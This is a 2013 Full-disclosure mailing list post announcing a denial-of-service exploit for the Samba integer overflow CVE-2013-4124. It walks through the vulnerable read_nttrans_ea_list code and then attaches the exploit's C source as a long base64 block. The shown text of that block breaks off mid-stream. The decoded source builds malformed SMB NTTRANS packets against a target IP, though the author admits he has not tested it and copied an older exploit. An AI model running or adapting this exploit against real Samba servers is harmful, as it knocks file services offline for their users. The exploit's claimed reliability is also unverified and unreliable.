[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] CVE-2013-4124 samba dos exploit
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] CVE-2013-4124 samba dos exploit
- From: x90c <geinblues@xxxxxxxxx>
- Date: Fri, 23 Aug 2013 08:17:06 +0900
Hi forks!
I added automated offset and second argv to
server name for nbt session to my samba
dos exploit I released before
and I attached the exploit on the article for it
samba dos exploit should be works!
Exploitation: samba nttrans reply integer overflow
___ ___
/ _ \ / _ \
__ __| (_) || | | | ___
\ \/ / \__. || | | | / __|
> < / / | |_| || (__
/_/\_\ /_/ \___/ \___|
[toc]
----[ 1 - Intro
----[ 2 - vulnerable versions
----[ 3 - call graph
----[ 4 - security bug analyze
----[ 5 - exploitability
----[ 6 - conclusion
----[ 7 - codes
----[ 1 - Intro
CVE-2013-4124 samba integer overflow in nttrans
reply reading ea_list
vulnerable samba daemon has a integer overflow
to cause remote dos by nttrans reply while the
daemon reading ea_list. In the detail, unsigned
data type offset variable in vulnerable function
of read_nttrans_ea_list can be wrap up! security
bug!
x90c
----[ 2 - vulnerable versions
- samba 3.5.22 <=
- samba 3.6.17 <=
- samba 4.0.8 <=
----[ 3 - call graph
+reply_nttrans // reply nttrans
+->handle_nttrans
+-> call_nt_transact_create // transact!
-> read_nttrns_ea_list(vulnerable function)
----[ 4 - security bug analyze
smbd/nttrans.c
---- snip ---- snip ---- snip ---- snip ----
971
/****************************************************************************
972 Read a list of EA names and data from an incoming data buffer. Create an
ea_list with them.
973
****************************************************************************/
974 EA names, data from samba incoming buffer!
975 struct ea_list *read_nttrans_ea_list(TALLOC_CTX *ctx, const char *pdata,
size_t data_size) // *pdata is inject vector
976 {
977 struct ea_list *ea_list_head = NULL;
978 size_t offset = 0; // unisigned
979
980 if (data_size < 4) {
981 return NULL;
982 }
983
984 while (offset + 4 <= data_size) { // XXX (3) if offset is wrap up
then it enters the loop continuly
985 size_t next_offset = IVAL(pdata,offset); // unsigned XXX
(1) if next_offset from pdata pointer is much large value then to lead integer
wrap!
// XXX (4) may memory corruption point! if offset is wrap up then second argv
pointer(pdata+offset+4) pointers around zero memory then smb dos!
986 struct ea_list *eal = read_ea_list_entry(ctx, pdata +
offset + 4, data_size - offset - 4, NULL);
987
988 if (!eal) {
989 return NULL;
990 }
991
992 DLIST_ADD_END(ea_list_head, eal, struct ea_list *);
993 if (next_offset == 0) {
994 break;
995 }
996
997 /* Integer wrap protection for the increment. */
// XXX patch code
998 if (offset + next_offset < offset) {
999 break;
1000 }
1001
1002 offset += next_offset; // XXX (2) if next_offset is
large value then offset is wrap!
1003
1004 /* Integer wrap protection for while loop. */ // XXX
patch code
1005 if (offset + 4 < offset) {
1006 break;
1007 }
1008
1009 }
1010
1011 return ea_list_head;
1012 }
---- snip ---- snip ---- snip ---- snip ----
---- snip ---- snip ---- snip ---- snip ----
1014
/****************************************************************************
1015 Reply to a NT_TRANSACT_CREATE call (needs to process SD's).
1016
****************************************************************************/
1017
1018 static void call_nt_transact_create(connection_struct *conn,
1019 struct smb_request *req,
1020 uint16 **ppsetup, uint32 setup_count,
1021 char **ppparams, uint32
parameter_count,
1022 char **ppdata, uint32 data_count,
1023 uint32 max_data_count)
1024 {
...
1148 /* We have already checked that ea_len <= data_count here.
*/
1149 ea_list = read_nttrans_ea_list(talloc_tos(), data + sd_len,
1150 ea_len);
---- snip ---- snip ---- snip ---- snip ----
---- snip ---- snip ---- snip ---- snip ----
2639 static void handle_nttrans(connection_struct *conn,
2640 struct trans_state *state,
2641 struct smb_request *req)
2642 {
...
2651 /* Now we must call the relevant NT_TRANS function */
2652 switch(state->call) {
2653 case NT_TRANSACT_CREATE: // NT_TRANSACT_CREATE!
2654 {
2655 START_PROFILE(NT_transact_create);
2656 call_nt_transact_create(
2657 conn, req,
2658 &state->setup, state->setup_count,
2659 &state->param, state->total_param,
2660 &state->data, state->total_data,
2661 state->max_data_return);
2662 END_PROFILE(NT_transact_create);
2663 break;
2664 }
---- snip ---- snip ---- snip ---- snip ----
---- snip ---- snip ---- snip ---- snip ----
2770
/****************************************************************************
2771 Reply to a SMBNTtrans.
2772
****************************************************************************/
2773
2774 void reply_nttrans(struct smb_request *req) // smb_request!
2775 {
...
2945 if ((state->received_data == state->total_data) &&
2946 (state->received_param == state->total_param)) {
2947 handle_nttrans(conn, state, req);
---- snip ---- snip ---- snip ---- snip ----
----[ 5 - exploitability
* keywords:
- samba incoming data
- EA names
- data
- 0xf1000000
- SMB NTTRANS
- Samba reply_nttrans() Remote Root Exploit
(http://www.securiteam.com/exploits/5TP0M2AAKS.html)
- SMB_COM_NT_TRANSACT(0xa0) = NTtrans (32-bit field)
- SMBtrans
- http://ubiqx.org/cifs/SMB.html
----[ 6 - conclusion
The security bug is remote dos to a daemon, the
impact is exist even though it's exploited on
local network. If large local network exist and
many samba on the network, security risk is exist.
I assign the dos impact to medium, and the apache
or wuftpd dos to high because they are can be
exploited on internet
the samba dos exploit will be reliable!
----[ 7 - codes
begin 644 samba_nttrans_exploit.c (base64)
LyoNCg0KICAgICEhISEhIFBSSVZBVEUgISEhISEgUFJJVkFURS
AhISEhISBQUklWQVRFICEhISEhIFBSSVZBVEUgISEhISENCg0K
CUNWRS0yMDEzLTQxMjQgc2FtYmEgZG9zIGV4cGxvaXQNCg0KCS
0tLS0NCglbeDkwY0B1YnVudHUgc2FtYmFfZG9zXSQgLi9zYW1i
YV9udHRyYW5zX2V4cGxvaXQNCiAgICAgICAgICAgICAgICAgIC
AgICAgICAgICAgICAgICAgIF9fXyAgICBfX18NCiAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgLyBfIFwgIC8gXy
BcDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgX18gIF9f
fCAoXykgfHwgfCB8IHwgIF9fXw0KICAgICAgICAgICAgICAgIC
AgICAgICAgICAgIFwgXC8gLyBcX18uIHx8IHwgfCB8IC8gX198
DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgID4gIDwgIC
AgLyAvIHwgfF98IHx8IChfXw0KICAgICAgICAgICAgICAgICAg
ICAgICAgICAgIC9fL1xfXCAgL18vICAgXF9fXy8gIFxfX198DQ
oNCg0KCXNhbWJhIG50dHJhbnMgcmVwbHkgZXhwbG9pdA0KDQoJ
c2FtYmEgbnR0cmFucyByZXBseSBleHBsb2l0IFVzYWdlOg0KDQ
oJLi9zYW1iYV9leHBsb2l0IFt0YXJnZXQgaXAgYWRkcl0gPHNl
cnZlciBuYW1lPg0KDQoJZXgpIC4vc2FtYmFfZXhwbG9pdCAxMC
4wLjEuMTYNCglleCkgLi9zYW1iYV9leHBsb2l0IDEwLjAuMS4x
NiBNWVNBTUJBDQoNCglbeDkwY0B1YnVudHUgc2FtYmFfZG9zXS
QNCgktLS0tDQoNCiAgICAgKiAuLi4gRGVzY3JpcHRpb24gLi4u
Og0KICAgICAgSSBkaWRuJ3QgdGVzdCBmb3IgdGhlIGV4cGxvaX
QgeWV0LCBJIA0KICAgICAgY29waWVkIGFub3RoZXIgc2FtYmEg
bnR0cmFucyBleHBsb2l0IA0KICAgICAgaW4gMjAwMyB0aGF0IG
h0dHA6Ly93d3cuc2VjdXJpdGVhbS5jbw0KICAgICAgbS9leHBs
b2l0cy81VFAwTTJBQUtTLmh0bWwuIDEpIHRoZSB2dWwNCiAgIC
AgIG5lcmFibGUgZGF0YSBvZmZzZXQgaXMgYXV0b21hdGVkIGZy
b20gDQogICAgICAweGZmZmZmZmZmIHRvIDB4ZjEwMDAwMDAgYW
5kIGNhbiBwYXNzIA0KICAgICAgc2Vjb25kIGFyZ3VtZW50IGZv
ciBzZXJ2ZXIgbmFtZSB0byBtYWtlIA0KICAgICAgbmJ0IHNlc3
Npb24gSWYgcGFzcyB0YXJnZXQgaXAgYWRkciANCiAgICAgIGFu
ZCBzZXJ2ZXIgbmFtZSB0byB0aGlzIGV4cGxvaXQgdGhlIA0KIC
AgICAgc2FtYmEgd2lsbCBiZSBkb3MhDQogICAgICANCiAgICAg
IHRoZSBleHBsb2l0IHNlbmQgbWFsZm9ybWVkIG50dHJhbnMgDQ
ogICAgICBzbWIgcGFja2V0IHdpdGggbGFyZ2UgdmFsdWUgb2Yg
ZGF0YSANCiAgICAgIG9mZnNldCBhbmQgcGFyYW0gb2Zmc2V0ID
IpIHRoZXkgYXJlIGFsbCANCiAgICAgIG9mIG9mZnNldCBvZiBu
dHRyYW5zIHN0cnVjdCB0byBjYXVzZSANCiAgICAgIGludGVnZX
Igd3JhcCBpbiB0aGUgdnVsbmVyYWJsZSBmdW5jdGlvbiANCiAg
ICAgIG9mIHJlYWRfbnR0cm5zX2VhX2xpc3QNCg0KICAgICAgSX
Qgc2hvdWxkIGJlIHdvcmtzIGJlY2F1c2UgMSkgMikNCg0KICAg
ICAgLSBleHBsb2l0IHByb2Nlc3M6DQogICAgICAgICAgKDEpIH
NtYiBuZWdvdGlhdGlvbnMNCiAgICAgICAgICAoMikgbWFsZm9y
bWVkIHNtYiBudHRyYW5zIHBhY2tldCB3aXRoaW4NCiAgICAgIC
AgICAgICAgb2Zmc2V0IDB4ZmZmZmZmZmYgfiAweGYxMDAwMDAw
IHRvDQogICAgICAgICAgICAgIGludGVnZXIgd3JhcCBzZW50IQ
0KICAgICAgICAgICgzKSAuLi4uLi4gc2FtYmEgZG9zIQ0KDQog
ICAgICBJIGxlZnQgYW4gYXJ0aWNsZSB0aGF0IGFuYWx5emVkIG
l0DQogICAgDQogICAgISEhISEgUFJJVkFURSAhISEhISBQUklW
QVRFICEhISEhIFBSSVZBVEUgISEhISEgUFJJVkFURSAhISEhIQ
0KDQoNCgl4OTBjDQoNCiovDQoNCiNpbmNsdWRlIDxzeXMvc29j
a2V0Lmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2
x1ZGUgPGFycGEvaW5ldC5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+
DQojaW5jbHVkZSA8ZXJybm8uaD4NCiNpbmNsdWRlIDxzdHJpbm
cuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHVu
aXN0ZC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZG
UgPGN0eXBlLmg+DQojaW5jbHVkZSA8c2lnbmFsLmg+DQoNCnR5
cGVkZWYgdW5zaWduZWQgY2hhciB1aW50ODsNCnR5cGVkZWYgdW
5zaWduZWQgc2hvcnQgdWludDE2Ow0KdHlwZWRlZiB1bnNpZ25l
ZCBsb25nIHVpbnQzMjsNCg0Kc3RydWN0IHZhcmlhYmxlX2RhdG
FfaGVhZGVyDQp7IHVpbnQ4IHdvcmRjb3VudCwgYnl0ZWNvdW50
WzJdOw0KfTsNCg0Kc3RydWN0IG5idF9zZXNzaW9uX2hlYWRlcg
0KeyB1aW50OCB0eXBlLCBmbGFncywgbGVuWzJdOw0KfTsNCg0K
c3RydWN0IHNtYl9iYXNlX2hlYWRlcg0KeyB1aW50OCBwcm90b2
NvbFs0XSwgY29tbWFuZCwgZXJyb3JjbGFzcywgcmVzZXJ2ZWQs
IGVycm9yY29kZVsyXTsNCiB1aW50OCBmbGFnczsNCiB1aW50OC
BmbGFnczJbMl0sIHJlc2VydmVkMlsxMl0sIHRpZFsyXSwgcGlk
WzJdLCB1aWRbMl0sIG1pZFsyXTsNCn07DQoNCnN0cnVjdCBuZW
dwcm90X3JlcGx5X2hlYWRlcg0KeyB1aW50OCB3b3JkY291bnQ7
DQogdWludDggZGlhbGVjdGluZGV4WzJdOw0KIHVpbnQ4IHNlY3
VyaXR5bW9kZTsNCiB1aW50MTYgbWF4bXB4Y291bnQsIG1heHZj
Y291bnQ7DQogdWludDMyIG1heGJ1ZnNpemUsIG1heHJhd3Npem
UsIHNlc3Npb25pZCwgY2FwYWJpbGl0aWVzLCB0aW1lbG93LCB0
aW1laGlnaDsNCiB1aW50MTYgdGltZXpvbmU7DQogdWludDgga2
V5bGVuOw0KIHVpbnQxNiBieXRlY291bnQ7DQp9Ow0KDQpzdHJ1
Y3Qgc2Vzc3NldHVweF9yZXF1ZXN0X2hlYWRlcg0KeyB1aW50OC
B3b3JkY291bnQsIGNvbW1hbmQsIHJlc2VydmVkOw0KIHVpbnQ4
IG9mZnNldFsyXSwgbWF4YnVmc2l6ZVsyXSwgbWF4bXB4Y291bn
RbMl0sIHZjbnVtYmVyWzJdOw0KIHVpbnQ4IHNlc3Npb25pZFs0
XTsNCiB1aW50OCBpcGFzc3dkbGVuWzJdLCBwYXNzd2RsZW5bMl
07DQogdWludDggcmVzZXJ2ZWQyWzRdLCBjYXBhYmlsaXRpZXNb
NF07DQp9Ow0KDQpzdHJ1Y3Qgc2Vzc3NldHVweF9yZXBseV9oZW
FkZXINCnsgdWludDggd29yZGNvdW50LCB4Y29tbWFuZCwgeHJl
c2VydmVkLCB4b2Zmc2V0WzJdLCBhY3Rpb25bMl0sIGJ5dGVjb3
VudFsyXTsNCn07DQoNCnN0cnVjdCB0Y29ueF9yZXF1ZXN0X2hl
YWRlcg0KeyB1aW50OCB3b3JkY291bnQsIHhjb21tYW5kLCB4cm
VzZXJ2ZWQsIHhvZmZzZXRbMl0sIGZsYWdzWzJdLCBwYXNzd2Rs
ZW5bMl0sIGJ5dGVjb3VudFsyXTsNCn07DQoNCnN0cnVjdCB0Y2
9ueF9yZXBseV9oZWFkZXINCnsgdWludDggd29yZGNvdW50LCB4
Y29tbWFuZCwgeHJlc2VydmVkLCB4b2Zmc2V0WzJdLCBzdXBwb3
J0Yml0c1syXSwgYnl0ZWNvdW50WzJdOw0KfTsNCg0Kc3RydWN0
IG50dHJhbnNfcmVxdWVzdF9oZWFkZXINCnsgDQoJdWludDggd2
9yZGNvdW50OyANCgl1aW50OCBtYXhzZXR1cGNvdW50OyANCgl1
aW50OCBmbGFnc1syXTsNCgl1aW50OCB0b3RhbHBhcmFtY291bn
RbNF07IA0KCXVpbnQ4IHRvdGFsZGF0YWNvdW50WzRdOw0KCXVp
bnQ4IG1heHBhcmFtY291bnRbNF07DQoJdWludDggbWF4ZGF0YW
NvdW50WzRdOw0KICAgIHVpbnQ4IHBhcmFtY291bnRbNF07DQoJ
dWludDggcGFyYW1vZmZzZXRbNF07CS8vIG9mZnNldCENCgl1aW
50OCBkYXRhY291bnRbNF07DQoJdWludDggZGF0YW9mZnNldFs0
XTsJLy8gWFhYIHRoZSBkYXRhIG9mZnNldCB2dWxuZXJhYmxlIQ
0KCXVpbnQ4IHNldHVwY291bnQ7CQkvLyAgICAgbnR0cmFucyBz
dHJ1Y3QgZG9lc24ndCBoYXZlIG90aGVyIG9mZnNldCANCgl1aW
50OCBmdW5jdGlvblsyXTsJCS8vICAgICBmaWVsZCB3aXRob3V0
IHRoZW0NCgl1aW50OCBieXRlY291bnRbMl07DQp9Ow0KDQojZG
VmaW5lIFNNQl9ORUdQUk9UIDB4NzINCiNkZWZpbmUgU01CX1NF
U1NTRVRVUFggMHg3Mw0KI2RlZmluZSBTTUJfVENPTlggMHg3NQ
0KI2RlZmluZSBTTUJfVFJBTlMyIDB4MzINCiNkZWZpbmUgU01C
X05UVFJBTlMgMHhBMA0KI2RlZmluZSBTTUJfTlRUUkFOU0NSRU
FURSAweDAxDQojZGVmaW5lIFNNQl9UUkFOUzJPUEVOIDB4MDAN
CiNkZWZpbmUgU01CX1NFU1NJT05SRVEgMHg4MQ0KI2RlZmluZS
BTTUJfU0VTU0lPTiAweDAwDQoNCnVpbnQzMiBzZXNzaW9uaWQs
IFBBUkFNQkFTRSA9IDB4ODFjMDAwMDsNCmNoYXIgKnRjb254X3
NlcnZlcm5hbWU7DQppbnQgdGlkLCBwaWQsIHVpZDsNCg0KI2Rl
ZmluZSBTVEFDS0JPVFRPTSAweGJmZmZmZmZmDQojZGVmaW5lIF
NUQUNLQkFTRSAweGJmZmZkMDAwDQojZGVmaW5lIFRPVEFMQ09V
TlQgKChpbnQpKFNUQUNLQk9UVE9NIC0gU1RBQ0tCQVNFKSkNCg
0KY2hhciAqbmV0Ymlvc19lbmNvZGVfbmFtZShjaGFyICpuYW1l
LCBpbnQgdHlwZSkNCnsgY2hhciBwbGFpbm5hbWVbMTZdLCBjLC
AqZW5jb2RlZCwgKnB0cjsNCiBpbnQgaSwgbGVuID0gc3RybGVu
KG5hbWUpOw0KIGlmICgoZW5jb2RlZCA9IG1hbGxvYygzNCkpID
09IE5VTEwpDQogeyBmcHJpbnRmKHN0ZGVyciwgIm1hbGxvYygp
IGZhaWxlZFxuIik7DQogZXhpdCgtMSk7DQogfQ0KIHB0ciA9IG
VuY29kZWQ7DQogc3RybmNweShwbGFpbm5hbWUsIG5hbWUsIDE1
KTsNCiAqcHRyKysgPSAweDIwOw0KIGZvciAoaSA9IDA7IGkgPC
AxNjsgaSsrKQ0KIHsgaWYgKGkgPT0gMTUpIGMgPSB0eXBlOw0K
IGVsc2UgDQogeyBpZiAoaSA8IGxlbikgYyA9IHRvdXBwZXIocG
xhaW5uYW1lW2ldKTsNCiAgZWxzZSBjID0gMHgyMDsNCiB9DQog
KnB0cisrID0gKCgoYyA+PiA0KSAmIDB4ZikgKyAweDQxKTsNCi
AqcHRyKysgPSAoKGMgJiAweGYpICsgMHg0MSk7DQogfQ0KICpw
dHIgPSAnXDAnOw0KIHJldHVybiBlbmNvZGVkOw0KfQ0KDQp2b2
lkIGNvbnN0cnVjdF9uYnRfc2Vzc2lvbl9oZWFkZXIoY2hhciAq
cHRyLCB1aW50OCB0eXBlLCB1aW50OCBmbGFncywgdWludDMyIG
xlbikNCnsgc3RydWN0IG5idF9zZXNzaW9uX2hlYWRlciAqbmJ0
X2hkciA9IChzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyICopcH
RyOw0KIHVpbnQxNiBubGVuOw0KDQovLyBnZWVuIGlkZWUgb2Yg
ZGl0IGRlIGp1aXN0ZSBtYW5pZXIgaXMsIG1hYXIgJ3QgbGlqa3
Qgd2VsIHRlIHdlcmtlbiAuLg0KIGlmIChsZW4gPiA2NTUzNSkg
bmxlbiA9IDY1NTM1Ow0KIGVsc2UgbmxlbiA9IGh0b25zKGxlbi
k7DQoNCiBtZW1zZXQoKHZvaWQgKiluYnRfaGRyLCAnXDAnLCBz
aXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpKTsNCi
ANCiBuYnRfaGRyLT50eXBlID0gdHlwZTsNCiBuYnRfaGRyLT5m
bGFncyA9IGZsYWdzOw0KIG1lbWNweSgmbmJ0X2hkci0+bGVuLC
Ambmxlbiwgc2l6ZW9mICh1aW50MTYpKTsNCn0NCg0KLy8gY2Fs
bGVyIHpvcmd0IHZvb3IganVpc3RlIHdhYXJkZSB2YW4gcHRyLg
0Kdm9pZCBjb25zdHJ1Y3Rfc21iX2Jhc2VfaGVhZGVyKGNoYXIg
KnB0ciwgdWludDggY29tbWFuZCwgdWludDggZmxhZ3MsIHVpbn
QxNiBmbGFnczIsIHVpbnQxNiB0aWQsIHVpbnQxNiBwaWQsIA0K
IHVpbnQxNiB1aWQsIHVpbnQxNiBtaWQpDQp7IHN0cnVjdCBzbW
JfYmFzZV9oZWFkZXIgKmJhc2VfaGRyID0gKHN0cnVjdCBzbWJf
YmFzZV9oZWFkZXIgKilwdHI7DQoNCiBtZW1zZXQoYmFzZV9oZH
IsICdcMCcsIHNpemVvZiAoc3RydWN0IHNtYl9iYXNlX2hlYWRl
cikpOw0KDQogbWVtY3B5KGJhc2VfaGRyLT5wcm90b2NvbCwgIl
x4ZmZTTUIiLCA0KTsNCg0KIGJhc2VfaGRyLT5jb21tYW5kID0g
Y29tbWFuZDsNCiBiYXNlX2hkci0+ZmxhZ3MgPSBmbGFnczsNCg
0KIG1lbWNweSgmYmFzZV9oZHItPmZsYWdzMiwgJmZsYWdzMiwg
c2l6ZW9mICh1aW50MTYpKTsNCiBtZW1jcHkoJmJhc2VfaGRyLT
50aWQsICZ0aWQsIHNpemVvZiAodWludDE2KSk7DQogbWVtY3B5
KCZiYXNlX2hkci0+cGlkLCAmcGlkLCBzaXplb2YgKHVpbnQxNi
kpOw0KIG1lbWNweSgmYmFzZV9oZHItPnVpZCwgJnVpZCwgc2l6
ZW9mICh1aW50MTYpKTsNCiBtZW1jcHkoYmFzZV9oZHItPm1pZC
wgJm1pZCwgc2l6ZW9mICh1aW50MTYpKTsNCn0NCg0Kdm9pZCBj
b25zdHJ1Y3Rfc2Vzc3NldHVweF9oZWFkZXIoY2hhciAqcHRyKQ
0KeyBzdHJ1Y3Qgc2Vzc3NldHVweF9yZXF1ZXN0X2hlYWRlciAq
c3hfaGRyID0gKHN0cnVjdCBzZXNzc2V0dXB4X3JlcXVlc3RfaG
VhZGVyICopcHRyOw0KIHVpbnQxNiBtYXhidWZzaXplID0gMHhm
ZmZmLCBtYXhtcHhjb3VudCA9IDIsIHZjbnVtYmVyID0gMzEyNT
csIHB3ZGxlbiA9IDA7DQogdWludDMyIGNhcGFiaWxpdGllcyA9
IDB4NTA7DQoNCiBtZW1zZXQoc3hfaGRyLCAnXDAnLCBzaXplb2
YgKHN0cnVjdCBzZXNzc2V0dXB4X3JlcXVlc3RfaGVhZGVyKSk7
DQoNCiBzeF9oZHItPndvcmRjb3VudCA9IDEzOw0KIHN4X2hkci
0+Y29tbWFuZCA9IDB4ZmY7DQogbWVtY3B5KCZzeF9oZHItPm1h
eGJ1ZnNpemUsICZtYXhidWZzaXplLCBzaXplb2YgKHVpbnQxNi
kpOw0KIG1lbWNweSgmc3hfaGRyLT52Y251bWJlciwgJnZjbnVt
YmVyLCBzaXplb2YgKHVpbnQxNikpOw0KIG1lbWNweSgmc3hfaG
RyLT5tYXhtcHhjb3VudCwgJm1heG1weGNvdW50LCBzaXplb2Yg
KHVpbnQxNikpOw0KIG1lbWNweSgmc3hfaGRyLT5zZXNzaW9uaW
QsICZzZXNzaW9uaWQsIHNpemVvZiAodWludDMyKSk7DQogbWVt
Y3B5KCZzeF9oZHItPmlwYXNzd2RsZW4sICZwd2RsZW4sIHNpem
VvZiAodWludDE2KSk7DQogbWVtY3B5KCZzeF9oZHItPnBhc3N3
ZGxlbiwgJnB3ZGxlbiwgc2l6ZW9mICh1aW50MTYpKTsNCiBtZW
1jcHkoJnN4X2hkci0+Y2FwYWJpbGl0aWVzLCAmY2FwYWJpbGl0
aWVzLCBzaXplb2YgKHVpbnQzMikpOw0KfQ0KDQovKg0Kc3RydW
N0IHRjb254X3JlcXVlc3RfaGVhZGVyDQp7IHVpbnQ4IHdvcmRj
b3VudCwgeGNvbW1hbmQsIHhyZXNlcnZlZCwgeG9mZnNldFsyXS
wgZmxhZ3NbMl0sIHBhc3N3ZGxlblsyXSwgYnl0ZWNvdW50WzJd
Ow0KIC0tIHVpbnQxNiBieXRlY291bnQgZ2VlZnQgbGVuZ3RlIH
ZhbiB2b2xnZW5kZSBmaWVsZHMgYWFuOiBjaGFyIHBhc3N3b3Jk
W10sIHBhdGhbXSwgc2VydmljZVtdOw0KfTsgKi8NCnZvaWQgY2
9uc3RydWN0X3Rjb254X2hlYWRlcihjaGFyICpwdHIpDQp7IHN0
cnVjdCB0Y29ueF9yZXF1ZXN0X2hlYWRlciAqdHhfaGRyID0gKH
N0cnVjdCB0Y29ueF9yZXF1ZXN0X2hlYWRlciAqKXB0cjsNCiB1
aW50MTYgcGFzc3dkbGVuID0gMSwgYnl0ZWNvdW50Ow0KIGNoYX
IgKmRhdGE7DQoNCiBtZW1zZXQodHhfaGRyLCAnXDAnLCBzaXpl
b2YgKHN0cnVjdCB0Y29ueF9yZXF1ZXN0X2hlYWRlcikpOw0KDQ
ogYnl0ZWNvdW50ID0gc3RybGVuKHRjb254X3NlcnZlcm5hbWUp
ICsgMTU7IA0KDQogaWYgKChkYXRhID0gbWFsbG9jKGJ5dGVjb3
VudCkpID09IE5VTEwpDQogeyBmcHJpbnRmKHN0ZGVyciwgIm1h
bGxvYygpIGZhaWxlZCwgYWJvcnRpbmchXG4iKTsNCiBleGl0KC
0xKTsNCiB9DQogbWVtY3B5KGRhdGEsICJceDAwXHg1Y1x4NWMi
LCAzKTsNCiBtZW1jcHkoZGF0YSArIDMsIHRjb254X3NlcnZlcm
5hbWUsIHN0cmxlbih0Y29ueF9zZXJ2ZXJuYW1lKSk7DQogbWVt
Y3B5KGRhdGEgKyAzICsgc3RybGVuKHRjb254X3NlcnZlcm5hbW
UpLCAiXHg1Y0lQQ1x4MjRceDAwXHgzZlx4M2ZceDNmXHgzZlx4
M2ZceDAwIiwgMTIpOw0KDQogdHhfaGRyLT53b3JkY291bnQgPS
A0Ow0KIHR4X2hkci0+eGNvbW1hbmQgPSAweGZmOw0KDQogbWVt
Y3B5KCZ0eF9oZHItPnBhc3N3ZGxlbiwgJnBhc3N3ZGxlbiwgc2
l6ZW9mICh1aW50MTYpKTsNCiBtZW1jcHkoJnR4X2hkci0+Ynl0
ZWNvdW50LCAmYnl0ZWNvdW50LCBzaXplb2YgKHVpbnQxNikpOw
0KDQogbWVtY3B5KHB0ciArIHNpemVvZiAoc3RydWN0IHRjb254
X3JlcXVlc3RfaGVhZGVyKSwgZGF0YSwgYnl0ZWNvdW50KTsNCn
0NCg0Kdm9pZCBuYnRfc2Vzc2lvbl9yZXF1ZXN0KGludCBmZCwg
Y2hhciAqY2xpZW50bmFtZSwgY2hhciAqc2VydmVybmFtZSkNCn
sgDQoJY2hhciAqY24sICpzbjsNCgljaGFyIHBhY2tldFtzaXpl
b2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpICsgKDM0IC
ogMildOw0KDQoJY29uc3RydWN0X25idF9zZXNzaW9uX2hlYWRl
cihwYWNrZXQsIFNNQl9TRVNTSU9OUkVRLCAwLCBzaXplb2YgKH
BhY2tldCkgLSBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9o
ZWFkZXIpKTsNCg0KCXRjb254X3NlcnZlcm5hbWUgPSBzZXJ2ZX
JuYW1lOw0KDQoJc24gPSBuZXRiaW9zX2VuY29kZV9uYW1lKHNl
cnZlcm5hbWUsIDB4MjApOw0KCWNuID0gbmV0Ymlvc19lbmNvZG
VfbmFtZShjbGllbnRuYW1lLCAweDAwKTsNCg0KCW1lbWNweShw
YWNrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZW
FkZXIpLCBzbiwgMzQpOw0KCW1lbWNweShwYWNrZXQgKyAoc2l6
ZW9mIChzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyKSArIDM0KS
wgY24sIDM0KTsNCg0KCXdyaXRlKGZkLCBwYWNrZXQsIHNpemVv
ZiAocGFja2V0KSk7DQoJY2xvc2UoZmQpOw0KDQoJZnJlZShjbi
k7DQoJZnJlZShzbik7DQp9DQoNCnZvaWQgcHJvY2Vzc19uYnRf
c2Vzc2lvbl9yZXBseShpbnQgZmQpDQp7IHN0cnVjdCBuYnRfc2
Vzc2lvbl9oZWFkZXIgbmJ0X2hkcjsNCiBjaGFyICplcnJvcm1z
ZzsNCiB1aW50OCBlcnJvcmNvZGU7DQogaW50IHNpemUsIGxlbi
A9IDA7DQoNCiBpZiAoKHNpemUgPSByZWFkKGZkLCAmbmJ0X2hk
ciwgc2l6ZW9mIChuYnRfaGRyKSkpID09IC0xKQ0KIHsgY2xvc2
UoZmQpOw0KIGZwcmludGYoc3RkZXJyLCAicmVhZCgpIGZhaWxl
ZCwgcmVhc29uOiAnJXMnIChjb2RlICVpKVxuIiwgc3RyZXJyb3
IoZXJybm8pLCBlcnJubyk7IA0KIGV4aXQoLWVycm5vKTsNCiB9
DQogaWYgKHNpemUgIT0gc2l6ZW9mIChuYnRfaGRyKSkNCiB7IG
Nsb3NlKGZkKTsNCiBmcHJpbnRmKHN0ZGVyciwgInJlYWQoKSBh
IGJyb2tlbiBwYWNrZXQsIGFib3J0aW5nLlxuIik7IA0KIGV4aX
QoLTEpOw0KIH0NCiBtZW1jcHkoJmxlbiwgJm5idF9oZHIubGVu
LCBzaXplb2YgKHVpbnQxNikpOw0KDQogaWYgKGxlbikNCiB7IH
JlYWQoZmQsICh2b2lkICopJmVycm9yY29kZSwgMSk7IA0KIGNs
b3NlKGZkKTsNCiBzd2l0Y2ggKGVycm9yY29kZSkNCiB7IGNhc2
UgMHg4MCA6IGVycm9ybXNnID0gIk5vdCBsaXN0ZW5pbmcgb24g
Y2FsbGVkIG5hbWUiOyBicmVhazsNCiAgY2FzZSAweDgxIDogZX
Jyb3Jtc2cgPSAiTm90IGxpc3RlbmluZyBmb3IgY2FsbGluZyBu
YW1lIjsgYnJlYWs7DQogIGNhc2UgMHg4MiA6IGVycm9ybXNnID
0gIkNhbGxlZCBuYW1lIG5vdCBwcmVzZW50IjsgYnJlYWs7DQog
IGNhc2UgMHg4MyA6IGVycm9ybXNnID0gIkNhbGxlZCBuYW1lIH
ByZXNlbnQsIGJ1dCBpbnN1ZmZpY2llbnQgcmVzb3VyY2VzIjsg
YnJlYWs7DQogIGNhc2UgMHg4ZiA6IGVycm9ybXNnID0gIlVuc3
BlY2lmaWVkIGVycm9yIjsgYnJlYWs7DQogIGRlZmF1bHQgOiBl
cnJvcm1zZyA9ICJVbnNwZWNpZmllZCBlcnJvciAodW5rbm93bi
BlcnJvciBjb2RlIHJlY2VpdmVkISkiOyBicmVhazsNCiB9DQog
ZnByaW50ZihzdGRlcnIsICJzZXNzaW9uIHJlcXVlc3QgZGVuaW
VkLCByZWFzb246ICclcycgKGNvZGUgJWkpXG4iLCBlcnJvcm1z
ZywgZXJyb3Jjb2RlKTsNCiBleGl0KC0xKTsNCiB9DQogcHJpbn
